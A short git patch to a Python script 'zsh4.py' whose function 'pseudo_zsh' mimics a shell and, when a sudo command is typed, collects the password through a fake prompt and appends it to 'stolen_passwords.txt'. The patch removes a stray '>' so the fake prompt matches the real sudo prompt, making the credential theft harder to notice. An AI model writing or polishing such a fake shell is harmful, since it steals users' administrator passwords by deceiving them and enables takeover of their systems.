From 0c0e2dd98e3327a794f6de3d0063292ea62d2187 Mon Sep 17 00:00:00 2001 From: HeXiangLong <3234374354@qq.com> Date: Wed, 2 Apr 2025 12:36:42 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=AD=A3=E5=AF=86=E7=A0=81=E6=8F=90?= =?UTF-8?q?=E7=A4=BA=E4=BF=A1=E6=81=AF=EF=BC=8C=E5=8E=BB=E6=8E=89=E5=A4=9A?= =?UTF-8?q?=E4=BD=99=E7=9A=84=E7=AC=A6=E5=8F=B7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- zsh4.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/zsh4.py b/zsh4.py index 6bbdc0b..b2273d3 100644 --- a/zsh4.py +++ b/zsh4.py @@ -41,7 +41,7 @@ def pseudo_zsh(): # 伪造 sudo 密码输入并记录 if args[0] == 'sudo': - fake_password = getpass.getpass(">Password: ") + fake_password = getpass.getpass("Password: ") with open("stolen_passwords.txt", "a") as f: f.write(fake_password + "\n") time.sleep(3) # 模拟延迟